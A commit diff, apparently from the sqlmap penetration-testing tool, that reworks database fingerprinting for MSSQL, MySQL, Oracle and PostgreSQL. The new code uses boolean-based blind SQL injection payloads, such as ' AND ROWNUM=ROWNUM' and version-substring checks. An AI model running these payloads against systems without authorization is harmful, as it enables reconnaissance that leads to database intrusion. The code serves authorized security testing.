Major speed increase in DBMS basic fingerprint

plugins/dbms/mssqlserver.py

@@ -177,18 +177,24 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
         logger.info(logMsg)
 
         randInt = str(randomInt(1))
-        query   = "LTRIM(STR(LEN(%s)))" % randInt
 
-        if inject.getValue(query) == "1":
+        payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
-            query   = "SELECT SUBSTRING((@@VERSION), 25, 1)"
+        result  = Request.queryPage(payload)
-            version = inject.getValue(query)
 
-            if version == "8":
+        if result == True:
-                kb.dbmsVersion = ["2008"]
+            for version in ( 0, 5, 8 ):
-            elif version == "5":
+                payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
-                kb.dbmsVersion = ["2005"]
+                result  = Request.queryPage(payload)
-            elif version == "0":
+
-                kb.dbmsVersion = ["2000"]
+                if result == True:
+                    if version == 8:
+                        kb.dbmsVersion = ["2008"]
+                    elif version == 5:
+                        kb.dbmsVersion = ["2005"]
+                    elif version == 0:
+                        kb.dbmsVersion = ["2000"]
+
+                    break
 
             if kb.dbmsVersion:
                 setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])

plugins/dbms/mysql.py

@@ -249,15 +249,18 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
         logger.info(logMsg)
 
         randInt = str(randomInt(1))
-        query = "CONCAT('%s', '%s')" % (randInt, randInt)
 
-        if inject.getValue(query) == (randInt * 2):
+        payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
+        result  = Request.queryPage(payload)
+
+        if result == True:
             logMsg = "confirming MySQL"
             logger.info(logMsg)
 
-            query = "LENGTH('%s')" % randInt
+            payload = agent.fullPayload(" AND CONCAT('%s', '%s')='%s%s'" % (randInt, randInt, randInt, randInt))
+            result  = Request.queryPage(payload)
 
-            if not inject.getValue(query) == "1":
+            if result != True:
                 warnMsg = "the back-end DMBS is not MySQL"
                 logger.warn(warnMsg)
 

plugins/dbms/oracle.py

@@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
 import re
 
+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@@ -38,6 +39,7 @@ from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import ORACLE_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request
 
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -163,17 +165,17 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
         logMsg = "testing Oracle"
         logger.info(logMsg)
 
-        query = "LENGTH(SYSDATE)"
+        payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
-        sysdate = inject.getValue(query)
+        result  = Request.queryPage(payload)
 
-        if sysdate and int(sysdate) > 0:
+        if result == True:
             logMsg = "confirming Oracle"
             logger.info(logMsg)
 
-            query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
+            payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
-            version = inject.getValue(query)
+            result  = Request.queryPage(payload)
 
-            if not version:
+            if result != True:
                 warnMsg = "the back-end DMBS is not Oracle"
                 logger.warn(warnMsg)
 
@@ -186,6 +188,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
             if not conf.extensiveFp:
                 return True
 
+            query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
+            version = inject.getValue(query)
+
             if re.search("^11", version):
                 kb.dbmsVersion = ["11i"]
             elif re.search("^10", version):

plugins/dbms/postgresql.py

@@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
 import re
 
+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@@ -39,6 +40,7 @@ from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import PGSQL_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request
 
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -168,15 +170,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
         logger.info(logMsg)
 
         randInt = str(randomInt(1))
-        query = "COALESCE(%s, NULL)" % randInt
 
-        if inject.getValue(query) == randInt:
+        payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
+        result  = Request.queryPage(payload)
+
+        if result == True:
             logMsg = "confirming PostgreSQL"
             logger.info(logMsg)
 
-            query = "LENGTH('%s')" % randInt
+            payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
+            result  = Request.queryPage(payload)
 
-            if not inject.getValue(query) == "1":
+            if result != True:
                 warnMsg = "the back-end DMBS is not PostgreSQL"
                 logger.warn(warnMsg)